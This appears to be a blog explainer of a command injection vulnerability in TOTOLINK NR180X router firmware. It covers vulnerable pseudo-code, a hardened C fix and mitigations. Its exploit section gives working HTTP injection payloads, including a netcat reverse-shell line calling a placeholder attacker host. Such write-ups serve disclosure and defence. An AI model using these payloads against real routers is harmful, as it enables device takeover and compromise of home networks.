In today’s long read, we dive into CVE-2022-44250, a critical vulnerability found in the TOTOLINK NR180X router, specifically in firmware version V9.1.u.6279_B20210910. This vulnerability allows an attacker to remotely inject system commands through the web management interface by exploiting the hostName parameter in the setOpModeCfg function.
Let’s break down how this vulnerability works, detail the exploit process, and discuss the real risks for users of affected devices.
What is CVE-2022-44250?
CVE-2022-44250 is a command injection vulnerability in TOTOLINK NR180X routers. Remote attackers can execute arbitrary commands on the router’s operating system by sending crafted HTTP requests to the administrative web interface.
Impacted Product:
Technical Details
The flaw originates in the function setOpModeCfg, which is accessible via the router’s web management portal. Normally, the function expects a harmless hostname value for the hostName parameter. But the router firmware does *not properly sanitize* this input, meaning whatever is sent is passed straight to the underlying system shell.
Here’s what a regular configuration request might look like:

```http
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168..1
Content-Type: application/x-www-form-urlencoded
Cookie: SESSIONID=...

module=net&action=setOpModeCfg&hostName=myrouter&mode=ap
```
But, due to the bug, someone can abuse the hostName field like this:

```http
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168..1
Content-Type: application/x-www-form-urlencoded
Cookie: SESSIONID=...

module=net&action=setOpModeCfg&hostName=evil;ls;/tmp;&mode=ap
```

*Notice the semicolons (;)?* The shell treats each one as a command separator, so everything after the first semicolon is executed as its own command by the Linux shell running on the router.
Vulnerable Code Snippet
Although the official firmware is closed, public write-ups and reverse engineering show vulnerable logic similar to:
```c
// Pseudo-code illustrating the vulnerability
char name[64];
strcpy(name, http_get_param("hostName")); // No sanitization (and no length check)!
char cmd[128];
sprintf(cmd, "uci set network.lan.hostname='%s'", name); // Attacker text lands inside the command line
system(cmd); // Direct execution via /bin/sh, command injection possible!
```

Because strcpy and sprintf pass attacker-controlled data straight to the shell, it's easy to run commands as root on the router.
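As an added example (not TOTOLINK's code), here is a hardened version of the logic above: an allow-list check on the hostname, followed by an execv call that never goes through a shell, so a value like `evil;ls;/tmp;` is rejected outright and could not be interpreted as commands even if it got through. The function names and the /sbin/uci path are assumptions.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>
#define HOSTNAME_MAX 63 /* RFC 1123 label limit; also bounds every copy below */

/* Allow-list check: letters, digits and '-' only, 1..63 chars, no leading or
 * trailing '-'. Shell metacharacters (';', '|', '`', '$', space, ...) never pass. */
int hostname_is_valid(const char *s)
{
    if (s == NULL) return 0;
    size_t n = strlen(s);
    if (n == 0 || n > HOSTNAME_MAX) return 0;
    if (s[0] == '-' || s[n - 1] == '-') return 0;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)s[i];
        if (!isalnum(c) && c != '-') return 0;
    }
    return 1;
}

/* Apply the setting without a shell: execv receives an argv array, so the
 * value is one argument whatever it contains. Returns -1 for invalid input or
 * a fork/wait failure, otherwise the child's exit status. Assumes /sbin/uci. */
int set_lan_hostname(const char *name)
{
    if (!hostname_is_valid(name)) return -1; /* reject before touching the system */
    char kv[sizeof("network.lan.hostname=") + HOSTNAME_MAX];
    snprintf(kv, sizeof kv, "network.lan.hostname=%s", name);
    char *argv[] = { "/sbin/uci", "set", kv, NULL };
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        execv(argv[0], argv);
        _exit(127); /* only reached if uci could not be started */
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* Constructed samples: a benign name and the injection string from the page. */
    const char *samples[] = { "myrouter", "evil;ls;/tmp;" };
    for (int i = 0; i < 2; i++)
        printf("%-16s -> %s\n", samples[i], hostname_is_valid(samples[i]) ? "accepted" : "rejected");
    return 0;
}
```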
Step-by-Step Exploit Example
Let’s run through a real-world example of exploiting this vulnerability.
Step 1: Confirm the Service
Make sure the web interface is accessible (default IP is usually 192.168..1 or 192.168.1.1).
Step 2: Craft the Payload
Suppose you want to check if the device is vulnerable by making it create a test file. You can POST this:

```http
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168..1
Content-Type: application/x-www-form-urlencoded

module=net&action=setOpModeCfg&hostName=routertest;touch /tmp/pwned;&mode=ap
```
Step 3: Check if the File Exists
If you can access a file list or get output from the router, check for /tmp/pwned. That would confirm command execution.
An attacker may use a reverse shell command. Example payload:

```http
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168..1
Content-Type: application/x-www-form-urlencoded

module=net&action=setOpModeCfg&hostName=xyz;nc -e /bin/sh attacker_ip 4444;&mode=ap
```
This would open a shell to the attacker’s machine, giving them root control.
Risks and Real-World Impact
- Full device takeover: Attackers can alter settings, install malware, or add persistence on the router.
- Network compromise: All connected devices can be monitored or attacked; DNS settings could be changed for phishing.
- Botnet inclusion: The router could be used in global attacks (DDoS, crypto-mining, etc.)
*Even if the web interface is only open internally, a compromised local device or a malicious browser extension could leverage this bug.*
Mitigation and Recommendations
- Update Firmware: TOTOLINK may have released a patched firmware; always run the latest version available from the vendor's support site.
- Restrict Management Access: Only allow HTTP(S) access from trusted hosts/networks.
- Block Remote Management: Disable WAN-side admin portals if not needed.
- Monitor for Unusual Devices or Files: Unrecognized users or files (like /tmp/pwned) are red flags.
References and Further Reading
- Official NVD Entry - CVE-2022-44250
- Mitre CVE Page
- Exploit Details at Exploit-DB
- Seebug Advisory (Chinese)
*Note: Always use exploits responsibly. Never attack networks or devices without explicit permission!*
Conclusion
CVE-2022-44250 is a serious vulnerability in TOTOLINK routers, allowing command injection through unsanitized input. If you have this device—update immediately, limit who can access your admin interface, and stay aware of what’s connected to your network.
Stay safe, and keep your firmware updated!
*If you found this guide helpful, share it with IT administrators and anyone running a TOTOLINK router. Awareness is the first line of defense against attacks!*
Timeline
Published on: 11/23/2022 16:15:00 UTC
Last modified on: 08/08/2023 14:22:00 UTC